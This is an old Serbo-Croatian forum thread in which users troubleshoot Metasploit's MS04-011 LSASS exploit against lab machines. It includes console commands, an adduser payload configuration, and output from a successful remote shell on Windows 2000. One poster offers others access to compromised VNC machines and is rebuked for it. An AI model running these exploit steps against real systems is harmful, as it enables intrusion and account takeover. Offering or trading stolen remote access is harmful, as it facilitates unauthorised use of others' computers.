S.S.T. @ 03.10.2007. 19:15
POzdrav,
Probavao sam neke exploite sa VMware-u i napadao drugi comp koji je umrezen sa ovim na kojem je VMware! Pokusavao sam i za VNC, ali ne znam tacno sta da upisem vrijednosti LHOST,LPORT,RHOST i RPORT!
Kasnije sam uzeo ovaj za admin pass (bilo mi je interesantno pa sam ga zato uzeo)! Isao sam ovim redosledom ali ne radi:
use windows/smb/ms04_011_lsass
set PAYLOAD windows/adduser
>> set

Global
======

No entries in data store.
Module: windows/smb/ms04_011_lsass
==================================
Name Value
---- -----
DCERPC::fake_bind_multi true
DCERPC::fake_bind_multi_append 0
DCERPC::fake_bind_multi_prepend 0
DCERPC::max_frag_size 4096
DCERPC::smb_pipeio rw
ENCODER
EXITFUNC thread
PASS metas
PAYLOAD windows/adduser
RHOST 193.154.0.3
RPORT 445
SMB::obscure_trans_pipe_level 0
SMB::pad_data_level 0
SMB::pad_file_level 0
SMB::pipe_evasion false
SMB::pipe_read_max_size 1024
SMB::pipe_read_min_size 1
SMB::pipe_write_max_size 1024
SMB::pipe_write_min_size 1
SMBDirect true
SMBDomain WORKGROUP
SMBName *SMBSERVER
SMBPass
SMBUser
SSL false
TARGET 1
TCP::max_send_size 0
TCP::send_delay 0
USER metas
WfsDelay 0

>> exploit

[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.0.2[\lsarpc]...
[*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.0.2[\lsarpc]...
[*] Getting OS information...
[*] Trying to exploit Windows 5.1
[*] Server appears to have been patched
[*] Exploit completed, but no session was created.

Ne kreira mi uopste account metasploit prilikom logina!
jorganwd @ 04.10.2007. 00:04
Exploit completed, but no session was created.

Znaci msf je pucao exploit, ali nije probio :)

Sta da kucas u LHOST, LPORT itd? Hehe, ludilo..... msf nije toliko ITeligentan da cita misli, vjerovatno moras da mu zadas jos neke parametre, kao sto su portovi i ip adrese?
S.S.T. @ 04.10.2007. 00:16
Procititao sam ja sta pise, ali nije mi jasno kako je competed ako nije zavrsio ono za sta je namjenjen!
Sto se tice VNC-a pokusavao sam i podesavao ja LPORT i LHOST na razne nacine, ali...
Znam ja sta je L(ocal)HOST i R(emote)HOST tj. IP napadaca i IP zrtve! POdesim ja to kako treba!
Imam 2 compa koji su umrezeni i na ovom jednom je +VMware instaliran i na njemu je Metasploit framework i sa njega napadam ovaj drugi umrezeni comp, a ne onaj na kojem je install framework! Ta mreza radi kako treba!
Iskljucim ja i Firewall tako da nije do toga!

Ako ko koristi nekoliko exploita iz frameworka koji rade neka posalje (ako nije problem) i objasni sta sve treba da podesim da pokusam, jer meni ne uspjeva ovo sto sam izabrao! :(
Hvala!

[Ovu poruku je menjao S.S.T. dana 04.10.2007. u 03:07 GMT+1]
m1k1 @ 04.10.2007. 13:13
[*] Server appears to have been patched

Zar ovo ne govori dovoljno? Komp verovatno ima instaliran update koji krpi ovo rupu.

Inače ja sam probao na win2k serveru i radi, kao i ostali exploiti u metasploit framework-u.

msf exploit(ms04_011_lsass) > exploit
[*] Started bind handler
[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.77.4[\lsarpc]...
[*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.77.4[\lsarpc]...
[*] Getting OS information...
[*] Trying to exploit Windows 5.0
[*] Sending stage (474 bytes)
[*] The DCERPC service did not reply to our request
[*] Command shell session 2 opened (192.168.77.1:47460 -> 192.168.77.4:4444)

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig
ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.77.4
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :

C:\WINNT\system32>
m1k1 @ 04.10.2007. 13:20
A evo šta piše u opisu exploit-a vezano za XP
Description:
This module exploits a stack overflow in the LSASS service, this
vulnerability was originally found by eEye. When re-exploiting a
Windows XP system, you will need need to run this module twice.
DCERPC request fragmentation can be performed by setting 'FragSize'
parameter.
jorganwd @ 04.10.2007. 21:56
Kralju, svaki exploit u MSF-u RADI! Problem je do tvoj patchovanog sistema. Gledaj to ovako: Pucas u covjeka iz pistolja, jesi ti ispalio metak ali nisi mu probio pancir. Uzeo si preveliki zalogaj :)

pa dje si m1k1 h4x0ru :)
jovica016 @ 05.10.2007. 19:02
Citat:
S.S.T.: Pokusavao sam i za VNC, ali ne znam tacno sta da upisem vrijednosti LHOST,LPORT,RHOST i RPORT!


Ako ti za prvih 2 sekunde kad vidis LHOST, RHOST, RPORT,... ne skapiras sta je sta, onda nemas sta da trazis u exploatisanju sistema. Prijateljski savet. Pozdrav.
S.S.T. @ 06.10.2007. 00:41
MA jovice ma skapirao sam ja to nego nece i nece! Pokusao sam sa drugom verzijom XP-a posto je ova zadnji "krik" WinXP-a i do toga je!
Hvala svima na pomoci!
jovica016 @ 06.10.2007. 16:41
Ok, kako ti kazes.


Pozzz
e wiZz @ 02.02.2008. 22:04
pa LHOST ti je ip lokal hosta kojim otvaras komand shell,RHOST(valjda znas) je "zrtvin" IP.
sto se tice VNC imas mali programcic potrazi na milw0rmu...koristio sam ga par puta,zaista radi....ako zelis imam ja dosta vncova pa ti mogu dati da se zabavljas :D
jorganwd @ 06.02.2008. 11:14
Citat:
e wiZz: pa LHOST ti je ip lokal hosta kojim otvaras komand shell,RHOST(valjda znas) je "zrtvin" IP.
sto se tice VNC imas mali programcic potrazi na milw0rmu...koristio sam ga par puta,zaista radi....ako zelis imam ja dosta vncova pa ti mogu dati da se zabavljas :D


Tebe bih odmah banovao i zabranio ti internet do kraja zivota. Ti si bruka i sramota za citav ITSec svijet.
razlog: http://infected.blogger.ba
Mitrović Srđan @ 06.02.2008. 16:16
Strasno ali strasno...ja sam mislio da su ovakve stvari davno izumrle.